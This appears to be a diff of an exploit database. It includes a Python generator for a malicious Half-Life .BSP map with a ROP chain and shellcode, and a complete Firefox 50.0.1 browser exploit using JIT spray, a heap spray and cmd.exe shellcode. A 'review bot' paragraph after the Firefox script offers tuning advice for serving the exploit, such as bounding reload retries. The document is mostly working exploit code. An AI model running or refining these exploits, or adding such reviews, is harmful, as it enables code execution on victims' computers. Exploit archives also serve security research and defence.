# 2: 4 --> Vertex Data
|
||||
|
||||
# VERTEX DATA
|
||||
# 0: 1.23, 23423.0, 3453.3
|
||||
# 1: 1.23, -9.0, 3453.3
|
||||
# 2: 1.0, 1.0, 1.0
|
||||
# 3: 1.0, 1.0, 1.0
|
||||
# 4: 0.0, 1.0, 0.0
|
||||
|
||||
# Example:
|
||||
# a = INDEX_BUFFER[2] ; a = 2
|
||||
# b = VERTEX_BUFFER[a] ; b = 4
|
||||
# vec = VERTEX_DATA[b] ; vec = 0.0, 1.0, 0.0
|
||||
|
||||
def dw(x):
|
||||
return pack("I", x)
|
||||
|
||||
def main():
|
||||
target_file = "eip-minimized.bsp"
|
||||
output_file = "exploit-gen.bsp"
|
||||
|
||||
print "GoldSource .BSP file corruptor"
|
||||
print " by @Digital_Cold"
|
||||
print
|
||||
|
||||
l.info("Corrupting target file %s" % target_file)
|
||||
|
||||
# Read in and memory map target file
|
||||
fp = open(target_file, 'rb')
|
||||
mmfile = mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY)
|
||||
fp.close()
|
||||
|
||||
VEC3_COUNT = 63
|
||||
# then come Saved EBP and return address
|
||||
|
||||
start_idx = INDEX_BUFFER_OFF + INITIAL_OFFSET
|
||||
second_idx = VERTEX_BUFFER_INDEXES_OFF
|
||||
vertex_data_start = VERTEX_DATA_OFF + 12*0x1000 # arbitrary offset, lower causes faults
|
||||
|
||||
l.info("Writing to index buffer offset %08x...", start_idx)
|
||||
l.info("Vertex buffer indexes start %08x", second_idx)
|
||||
l.info("Vertex data at %08x", vertex_data_start)
|
||||
|
||||
data_buffer = []
|
||||
|
||||
for i in range(VEC3_COUNT):
|
||||
for j in range(3):
|
||||
data_buffer.append(str(chr(0x41+i)*4)) # easy to see pattern in memory
|
||||
|
||||
data_buffer.append("\x00\x00\x00\x00") # dont care
|
||||
data_buffer.append("\x00\x00\x00\x00") # unk1
|
||||
data_buffer.append("\x00\x00\x00\x00") # unk2
|
||||
|
||||
data_buffer.append("\x00\x00\x00\x00") # numVerts (needs to be zero to skip tail call)
|
||||
data_buffer.append("\x00\x00\x00\x00") # EBP
|
||||
data_buffer.append(dw(0x01407316)) # Saved Ret --> POP EBP; RET [hl.exe]
|
||||
|
||||
# XXX: bug in mona. This is a ptr to VirtualProtectEx!!
|
||||
# 0x387e01ec, # ptr to &VirtualProtect() [IAT steamclient.dll]
|
||||
|
||||
"""
|
||||
Register setup for VirtualAlloc() :
|
||||
--------------------------------------------
|
||||
EAX = NOP (0x90909090)
|
||||
ECX = flProtect (0x40)
|
||||
EDX = flAllocationType (0x1000)
|
||||
EBX = dwSize
|
||||
ESP = lpAddress (automatic)
|
||||
EBP = ReturnTo (ptr to jmp esp)
|
||||
ESI = ptr to VirtualAlloc()
|
||||
EDI = ROP NOP (RETN)
|
||||
--- alternative chain ---
|
||||
EAX = ptr to &VirtualAlloc()
|
||||
ECX = flProtect (0x40)
|
||||
EDX = flAllocationType (0x1000)
|
||||
EBX = dwSize
|
||||
ESP = lpAddress (automatic)
|
||||
EBP = POP (skip 4 bytes)
|
||||
ESI = ptr to JMP [EAX]
|
||||
EDI = ROP NOP (RETN)
|
||||
+ place ptr to "jmp esp" on stack, below PUSHAD
|
||||
--------------------------------------------
|
||||
"""
|
||||
|
||||
# START ROP CHAIN
|
||||
# DEP disable ROP chain
|
||||
# rop chain generated with mona.py - www.corelan.be
|
||||
#
|
||||
# useful for finding INT3 gadget - !mona find -s ccc3 -type bin -m hl,steamclient,filesystem_stdio
|
||||
rop_gadgets = [
|
||||
#0x3808A308, # INT3 # RETN [steamclient.dll]
|
||||
0x38420ade, # POP EDX # RETN [steamclient.dll]
|
||||
0x387e01e8, # ptr to &VirtualAlloc() [IAT steamclient.dll]
|
||||
0x381236c5, # MOV ESI,DWORD PTR DS:[EDX] # ADD DH,DH # RETN [steamclient.dll]
|
||||
0x381ebdc1, # POP EBP # RETN [steamclient.dll]
|
||||
0x381f98cd, # & jmp esp [steamclient.dll]
|
||||
0x387885ac, # POP EBX # RETN [steamclient.dll]
|
||||
0x00000001, # 0x00000001-> ebx
|
||||
0x384251c9, # POP EDX # RETN [steamclient.dll]
|
||||
0x00001000, # 0x00001000-> edx
|
||||
0x387cd449, # POP ECX # RETN [steamclient.dll]
|
||||
0x00000040, # 0x00000040-> ecx
|
||||
0x386c57fe, # POP EDI # RETN [steamclient.dll]
|
||||
0x385ca688, # RETN (ROP NOP) [steamclient.dll]
|
||||
0x0140b00e, # POP EAX # RETN [hl.exe]
|
||||
0x90909090, # nop
|
||||
0x385c0d3e, # PUSHAD # RETN [steamclient.dll]
|
||||
]
|
||||
|
||||
|
||||
# Can be replaced with ANY shellcode desired...
|
||||
# http://shell-storm.org/shellcode/files/shellcode-662.php
|
||||
shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" + \
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" + \
|
||||
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" + \
|
||||
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" + \
|
||||
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" + \
|
||||
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" + \
|
||||
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" + \
|
||||
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" + \
|
||||
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" + \
|
||||
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" + \
|
||||
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" + \
|
||||
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" + \
|
||||
"\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" + \
|
||||
"\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" + \
|
||||
"\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" + \
|
||||
"\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" + \
|
||||
"\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" + \
|
||||
"\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" + \
|
||||
"\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" + \
|
||||
"\x24\x20\x57\xFF\xD0"
|
||||
|
||||
shellcode += "\xeb\xfe" # infinite loop! (we dont want hl.exe to crash)
|
||||
shellcode += "\xeb\xfe"
|
||||
shellcode += "\xeb\xfe"
|
||||
shellcode += "\xeb\xfe"
|
||||
shellcode += "\xeb\xfe"
|
||||
|
||||
shellcode_dwords = int(math.ceil(len(shellcode)/4.0))
|
||||
extra_dwords = int(math.ceil((len(rop_gadgets)+shellcode_dwords)/3.0))
|
||||
|
||||
# Loop count (needs to be the exact amount of ROP we want to write
|
||||
data_buffer.append(dw(extra_dwords))
|
||||
|
||||
for addr in rop_gadgets:
|
||||
data_buffer.append(dw(addr))
|
||||
|
||||
for b in range(shellcode_dwords):
|
||||
data = ""
|
||||
|
||||
for byte in range(4):
|
||||
idx = byte + b*4
|
||||
|
||||
# pad to nearest DWORD with INT3
|
||||
if idx >= len(shellcode):
|
||||
data += "\xcc"
|
||||
else:
|
||||
data += shellcode[idx]
|
||||
|
||||
data_buffer.append(data)
|
||||
|
||||
second_idx += 8000*4 # time 4 because we skip every-other WORD, which means each index has 4 bytes
|
||||
|
||||
# 8000 is arbitrary, but it doesn't cause the map load to exit with a FATAL before
|
||||
# we can exploit the function
|
||||
|
||||
# UNCOMMENT TO CHANGE INITIAL SIZE OF OVERFLOW
|
||||
#mmfile[NUM_EDGES_OFF] = pack("B", 0x41)
|
||||
|
||||
for i in range(int(math.ceil(len(data_buffer)/3.0))):
|
||||
mmfile[start_idx+4*i:start_idx+4*(i+1)] = pack("I", 8000+i)
|
||||
mmfile[second_idx+2*i:second_idx+2*(i+1)] = pack("H", 0x1000+i)
|
||||
|
||||
second_idx += 2 # required because the game loads every-other word
|
||||
|
||||
# This data will now be on the stack
|
||||
for j in range(3):
|
||||
sub_idx = j*4 + i*0xc
|
||||
data_idx = i*3 + j
|
||||
towrite = ""
|
||||
|
||||
if data_idx >= len(data_buffer):
|
||||
towrite = "\x00"*4
|
||||
else:
|
||||
towrite = data_buffer[i*3 + j]
|
||||
|
||||
mmfile[vertex_data_start+sub_idx:vertex_data_start+sub_idx+4] = towrite
|
||||
#l.debug("Write[%08x] --> offset %d" % (unpack("I", towrite)[0], vertex_data_start+sub_idx))
|
||||
|
||||
# write out the corrupted file
|
||||
outfile = open(output_file, "wb")
|
||||
outfile.write(mmfile)
|
||||
outfile.close()
|
||||
|
||||
l.info("Wrote %d byte exploit file to %s" % (len(mmfile), output_file))
|
||||
l.info("Copy to game maps/ directory!")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
|
@ -26,7 +26,7 @@ do not use the exploit for attacking.
|
|||
The attached file is at:
|
||||
|
||||
http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
|
||||
|
||||
MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6
|
||||
|
||||
|
|
|
@ -20,6 +20,6 @@
|
|||
was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability."
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar
|
||||
|
||||
|
|
@ -8,7 +8,7 @@ Version: 0.3z R2
|
|||
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
|
||||
Windows Server 2008, it should work on all Windows.
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
|
||||
*/
|
||||
|
||||
#include "main.h"
|
||||
|
|
|
@ -2,7 +2,7 @@ FreeSSHD all version Remote Authentication Bypass ZERODAY
|
|||
Discovered & Exploited by Kingcope
|
||||
Year 2011
|
||||
|
||||
## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
|
||||
|
||||
Run like:
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
Generation:
|
||||
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
|
||||
|
||||
-->
|
||||
|
||||
|
|
375
platforms/windows/remote/42327.html
Executable file
375
platforms/windows/remote/42327.html
Executable file
|
@ -0,0 +1,375 @@
|
|||
<!DOCTYPE HTML>
|
||||
|
||||
<!--
|
||||
|
||||
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
|
||||
PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)
|
||||
|
||||
Tested on:
|
||||
|
||||
Release 50.0.1 32-bit - Windows 8.1 / Windows 10
|
||||
https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe
|
||||
|
||||
Howto:
|
||||
|
||||
1) serve PoC over network and open it in Firefox 50.0.1 32-bit
|
||||
2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe
|
||||
|
||||
A successfull exploit attempt should pop cmd.exe
|
||||
|
||||
Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/
|
||||
|
||||
(C) Rh0
|
||||
|
||||
Jul. 13, 2017
|
||||
|
||||
-->
|
||||
|
||||
<script async>
|
||||
function asm_js_module(){
|
||||
"use asm";
|
||||
/* huge jitted nop sled */
|
||||
function payload_code(){
|
||||
var val = 0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
/* 3 byte VirtualAlloc RWX stager */
|
||||
val = (val + 0xa890db31)|0;
|
||||
val = (val + 0xa89030b3)|0;
|
||||
val = (val + 0xa81b8b64)|0;
|
||||
val = (val + 0xa80c5b8b)|0;
|
||||
val = (val + 0xa81c5b8b)|0;
|
||||
val = (val + 0xa8b9006a)|0;
|
||||
val = (val + 0xa8904c4c)|0;
|
||||
val = (val + 0xa8902eb1)|0;
|
||||
val = (val + 0xa85144b5)|0;
|
||||
val = (val + 0xa8b99090)|0;
|
||||
val = (val + 0xa8903233)|0;
|
||||
val = (val + 0xa89045b1)|0;
|
||||
val = (val + 0xa8514cb5)|0;
|
||||
val = (val + 0xa8b99090)|0;
|
||||
val = (val + 0xa8904e52)|0;
|
||||
val = (val + 0xa8904bb1)|0;
|
||||
val = (val + 0xa85145b5)|0;
|
||||
val = (val + 0xa8590e6a)|0;
|
||||
val = (val + 0xa84fe789)|0;
|
||||
val = (val + 0xa8086b8b)|0;
|
||||
val = (val + 0xa820738b)|0;
|
||||
val = (val + 0xa8471b8b)|0;
|
||||
val = (val + 0xa82ae349)|0;
|
||||
val = (val + 0xa890c031)|0;
|
||||
val = (val + 0xa890ad66)|0;
|
||||
val = (val + 0xa89c613c)|0;
|
||||
val = (val + 0xa8077c9d)|0;
|
||||
val = (val + 0xa890202c)|0;
|
||||
val = (val + 0xa89c073a)|0;
|
||||
val = (val + 0xa8d7749d)|0;
|
||||
val = (val + 0xa890bdeb)|0;
|
||||
val = (val + 0xa8b9006a)|0;
|
||||
val = (val + 0xa890636f)|0;
|
||||
val = (val + 0xa8906cb1)|0;
|
||||
val = (val + 0xa8516cb5)|0;
|
||||
val = (val + 0xa8b99090)|0;
|
||||
val = (val + 0xa890416c)|0;
|
||||
val = (val + 0xa89075b1)|0;
|
||||
val = (val + 0xa85161b5)|0;
|
||||
val = (val + 0xa8b99090)|0;
|
||||
val = (val + 0xa8907472)|0;
|
||||
val = (val + 0xa89056b1)|0;
|
||||
val = (val + 0xa85169b5)|0;
|
||||
val = (val + 0xa890eb89)|0;
|
||||
val = (val + 0xa83cc583)|0;
|
||||
val = (val + 0xa8006d8b)|0;
|
||||
val = (val + 0xa890dd01)|0;
|
||||
val = (val + 0xa878c583)|0;
|
||||
val = (val + 0xa8006d8b)|0;
|
||||
val = (val + 0xa890dd01)|0;
|
||||
val = (val + 0xa820458b)|0;
|
||||
val = (val + 0xa890d801)|0;
|
||||
val = (val + 0xa890d231)|0;
|
||||
val = (val + 0xa890e789)|0;
|
||||
val = (val + 0xa8590d6a)|0;
|
||||
val = (val + 0xa810348b)|0;
|
||||
val = (val + 0xa890de01)|0;
|
||||
val = (val + 0xa890a6f3)|0;
|
||||
val = (val + 0xa8900de3)|0;
|
||||
val = (val + 0xa804c283)|0;
|
||||
val = (val + 0xa890dbeb)|0;
|
||||
val = (val + 0xa8247d8b)|0;
|
||||
val = (val + 0xa890df01)|0;
|
||||
val = (val + 0xa890ead1)|0;
|
||||
val = (val + 0xa890d701)|0;
|
||||
val = (val + 0xa890d231)|0;
|
||||
val = (val + 0xa8178b66)|0;
|
||||
val = (val + 0xa81c7d8b)|0;
|
||||
val = (val + 0xa890df01)|0;
|
||||
val = (val + 0xa802e2c1)|0;
|
||||
val = (val + 0xa890d701)|0;
|
||||
val = (val + 0xa8903f8b)|0;
|
||||
val = (val + 0xa890df01)|0;
|
||||
val = (val + 0xa890406a)|0;
|
||||
val = (val + 0xa890c031)|0;
|
||||
val = (val + 0xa85030b4)|0;
|
||||
val = (val + 0xa85010b4)|0;
|
||||
val = (val + 0xa890006a)|0;
|
||||
val = (val + 0xa890d7ff)|0;
|
||||
val = (val + 0xa890c931)|0;
|
||||
val = (val + 0xa89000b5)|0;
|
||||
val = (val + 0xa890c3b1)|0;
|
||||
val = (val + 0xa890ebd9)|0;
|
||||
val = (val + 0xa82434d9)|0;
|
||||
val = (val + 0xa890e689)|0;
|
||||
val = (val + 0xa80cc683)|0;
|
||||
val = (val + 0xa890368b)|0;
|
||||
val = (val + 0xa85fc683)|0;
|
||||
val = (val + 0xa890c789)|0;
|
||||
val = (val + 0xa81e8b66)|0;
|
||||
val = (val + 0xa81f8966)|0;
|
||||
val = (val + 0xa802c683)|0;
|
||||
val = (val + 0xa802c783)|0;
|
||||
val = (val + 0xa8901e8a)|0;
|
||||
val = (val + 0xa8901f88)|0;
|
||||
val = (val + 0xa803c683)|0;
|
||||
val = (val + 0xa801c783)|0;
|
||||
val = (val + 0xa803e983)|0;
|
||||
val = (val + 0xa89008e3)|0;
|
||||
val = (val + 0xa890cceb)|0;
|
||||
val = (val + 0xa890e0ff)|0;
|
||||
val = (val + 0xa824248d)|0;
|
||||
/* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */
|
||||
val = (val + 0xa882e8fc)|0;
|
||||
val = (val + 0xa8000000)|0;
|
||||
val = (val + 0xa8e58960)|0;
|
||||
val = (val + 0xa864c031)|0;
|
||||
val = (val + 0xa830508b)|0;
|
||||
val = (val + 0xa80c528b)|0;
|
||||
val = (val + 0xa814528b)|0;
|
||||
val = (val + 0xa828728b)|0;
|
||||
val = (val + 0xa84ab70f)|0;
|
||||
val = (val + 0xa8ff3126)|0;
|
||||
val = (val + 0xa8613cac)|0;
|
||||
val = (val + 0xa82c027c)|0;
|
||||
val = (val + 0xa8cfc120)|0;
|
||||
val = (val + 0xa8c7010d)|0;
|
||||
val = (val + 0xa852f2e2)|0;
|
||||
val = (val + 0xa8528b57)|0;
|
||||
val = (val + 0xa84a8b10)|0;
|
||||
val = (val + 0xa84c8b3c)|0;
|
||||
val = (val + 0xa8e37811)|0;
|
||||
val = (val + 0xa8d10148)|0;
|
||||
val = (val + 0xa8598b51)|0;
|
||||
val = (val + 0xa8d30120)|0;
|
||||
val = (val + 0xa818498b)|0;
|
||||
val = (val + 0xa8493ae3)|0;
|
||||
val = (val + 0xa88b348b)|0;
|
||||
val = (val + 0xa831d601)|0;
|
||||
val = (val + 0xa8c1acff)|0;
|
||||
val = (val + 0xa8010dcf)|0;
|
||||
val = (val + 0xa8e038c7)|0;
|
||||
val = (val + 0xa803f675)|0;
|
||||
val = (val + 0xa83bf87d)|0;
|
||||
val = (val + 0xa875247d)|0;
|
||||
val = (val + 0xa88b58e4)|0;
|
||||
val = (val + 0xa8012458)|0;
|
||||
val = (val + 0xa88b66d3)|0;
|
||||
val = (val + 0xa88b4b0c)|0;
|
||||
val = (val + 0xa8011c58)|0;
|
||||
val = (val + 0xa8048bd3)|0;
|
||||
val = (val + 0xa8d0018b)|0;
|
||||
val = (val + 0xa8244489)|0;
|
||||
val = (val + 0xa85b5b24)|0;
|
||||
val = (val + 0xa85a5961)|0;
|
||||
val = (val + 0xa8e0ff51)|0;
|
||||
val = (val + 0xa85a5f5f)|0;
|
||||
val = (val + 0xa8eb128b)|0;
|
||||
val = (val + 0xa86a5d8d)|0;
|
||||
val = (val + 0xa8858d01)|0;
|
||||
val = (val + 0xa80000b2)|0;
|
||||
val = (val + 0xa8685000)|0;
|
||||
val = (val + 0xa86f8b31)|0;
|
||||
val = (val + 0xa8d5ff87)|0;
|
||||
val = (val + 0xa80efebb)|0;
|
||||
val = (val + 0xa868ea32)|0;
|
||||
val = (val + 0xa8bd95a6)|0;
|
||||
val = (val + 0xa8d5ff9d)|0;
|
||||
val = (val + 0xa87c063c)|0;
|
||||
val = (val + 0xa8fb800a)|0;
|
||||
val = (val + 0xa80575e0)|0;
|
||||
val = (val + 0xa81347bb)|0;
|
||||
val = (val + 0xa86a6f72)|0;
|
||||
val = (val + 0xa8ff5300)|0;
|
||||
val = (val + 0xa86d63d5)|0;
|
||||
val = (val + 0xa8652e64)|0;
|
||||
val = (val + 0xa8006578)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
|
||||
return val|0;
|
||||
}
|
||||
return payload_code
|
||||
}
|
||||
</script>
|
||||
|
||||
<script>
|
||||
function spray_asm_js_modules(){
|
||||
sprayed = []
|
||||
for (var i=0; i<= 0x1800; i++){
|
||||
sprayed[i] = asm_js_module()
|
||||
}
|
||||
}
|
||||
|
||||
/* heap spray inspired by skylined */
|
||||
function heap_spray_fake_objects(){
|
||||
var heap = []
|
||||
var current_address = 0x08000000
|
||||
var block_size = 0x1000000
|
||||
while(current_address < object_target_address){
|
||||
var heap_block = new Uint32Array(block_size/4 - 0x100)
|
||||
for (var offset = 0; offset < block_size; offset += 0x100000){
|
||||
|
||||
/* fake object target = ecx + 0x88 and fake vtable*/
|
||||
heap_block[offset/4 + 0x00/4] = object_target_address
|
||||
/* self + 4 */
|
||||
heap_block[offset/4 + 0x14/4] = object_target_address
|
||||
/* the path to EIP */
|
||||
heap_block[offset/4 + 0x18/4] = 4
|
||||
heap_block[offset/4 + 0xac/4] = 1
|
||||
/* fake virtual function --> JIT target */
|
||||
heap_block[offset/4 + 0x138/4] = jit_payload_target
|
||||
}
|
||||
heap.push(heap_block)
|
||||
current_address += block_size
|
||||
}
|
||||
return heap
|
||||
}
|
||||
|
||||
/* address of fake object */
|
||||
object_target_address = 0x30300000
|
||||
|
||||
/* address of our jitted shellcode */
|
||||
jit_payload_target = 0x1c1c0054
|
||||
|
||||
/* ASM.JS JIT Spray */
|
||||
spray_asm_js_modules()
|
||||
|
||||
/* Spray fake objects */
|
||||
heap = heap_spray_fake_objects()
|
||||
|
||||
/* -----> */
|
||||
/* bug trigger ripped from bugzilla report */
|
||||
var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
|
||||
worker.postMessage("zero");
|
||||
var svgns = 'http://www.w3.org/2000/svg';
|
||||
var heap80 = new Array(0x1000);
|
||||
var heap100 = new Array(0x4000);
|
||||
var block80 = new ArrayBuffer(0x80);
|
||||
var block100 = new ArrayBuffer(0x100);
|
||||
var sprayBase = undefined;
|
||||
var arrBase = undefined;
|
||||
var animateX = undefined;
|
||||
var containerA = undefined;
|
||||
var offset = 0x88 // Firefox 50.0.1
|
||||
|
||||
var exploit = function(){
|
||||
var u32 = new Uint32Array(block80)
|
||||
|
||||
u32[0x4] = arrBase - offset;
|
||||
u32[0xa] = arrBase - offset;
|
||||
u32[0x10] = arrBase - offset;
|
||||
|
||||
for(i = heap100.length/2; i < heap100.length; i++)
|
||||
{
|
||||
heap100[i] = block100.slice(0)
|
||||
}
|
||||
|
||||
for(i = 0; i < heap80.length/2; i++)
|
||||
{
|
||||
heap80[i] = block80.slice(0)
|
||||
}
|
||||
|
||||
animateX.setAttribute('begin', '59s')
|
||||
animateX.setAttribute('begin', '58s')
|
||||
|
||||
for(i = heap80.length/2; i < heap80.length; i++)
|
||||
{
|
||||
heap80[i] = block80.slice(0)
|
||||
}
|
||||
|
||||
for(i = heap100.length/2; i < heap100.length; i++)
|
||||
{
|
||||
heap100[i] = block100.slice(0)
|
||||
}
|
||||
|
||||
animateX.setAttribute('begin', '10s')
|
||||
animateX.setAttribute('begin', '9s')
|
||||
containerA.pauseAnimations();
|
||||
}
|
||||
|
||||
worker.onmessage = function(e) {arrBase=object_target_address; exploit()}
|
||||
//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}
|
||||
|
||||
var trigger = function(){
|
||||
containerA = document.createElementNS(svgns, 'svg')
|
||||
var containerB = document.createElementNS(svgns, 'svg');
|
||||
animateX = document.createElementNS(svgns, 'animate')
|
||||
var animateA = document.createElementNS(svgns, 'animate')
|
||||
var animateB = document.createElementNS(svgns, 'animate')
|
||||
var animateC = document.createElementNS(svgns, 'animate')
|
||||
var idA = "ia";
|
||||
var idC = "ic";
|
||||
animateA.setAttribute('id', idA);
|
||||
animateA.setAttribute('end', '50s');
|
||||
animateB.setAttribute('begin', '60s');
|
||||
animateB.setAttribute('end', idC + '.end');
|
||||
animateC.setAttribute('id', idC);
|
||||
animateC.setAttribute('end', idA + '.end');
|
||||
containerA.appendChild(animateX)
|
||||
containerA.appendChild(animateA)
|
||||
containerA.appendChild(animateB)
|
||||
containerB.appendChild(animateC)
|
||||
document.body.appendChild(containerA);
|
||||
document.body.appendChild(containerB);
|
||||
}
|
||||
|
||||
window.onload = trigger;
|
||||
setInterval("window.location.reload()", 3000)
|
||||
/* <----- */
|
||||
|
||||
</script>
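Review bot: `setInterval("window.location.reload()", 3000)` at the bottom of the script reloads the page unconditionally every three seconds with no retry cap, so on a machine where the SMIL race never lines up the tab keeps re-spraying roughly 0x29 blocks of ~16 MB (0x08000000 up to 0x30300000 in 0x1000000 steps) plus 0x1801 asm.js modules until someone kills it; the string argument is also an implicit eval. When served over HTTP as the Howto describes, I would bound the attempts and pass a function, e.g. `var tries = +sessionStorage.getItem('tries') || 0; if (tries < 10) { sessionStorage.setItem('tries', tries + 1); setInterval(function(){ window.location.reload() }, 3000) }`. The constants `object_target_address = 0x30300000` and `jit_payload_target = 0x1c1c0054` also deserve a comment saying they are the expected addresses of the fake-object spray and of the jitted nop sled, presumably derived from the spray sizes above for 32-bit Firefox 50.0.1, and must be re-derived together with `offset = 0x88` for any other build. The implicit globals `sprayed` and `heap` (no `var`) are intentional cross-function state and would read better declared next to the two target addresses.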
|
|
@ -1,5 +1,5 @@
|
|||
Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
|
||||
|
||||
# milw0rm.com [2008-01-21]
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
|
||||
|
||||
# milw0rm.com [2008-03-04]
|
||||
|
|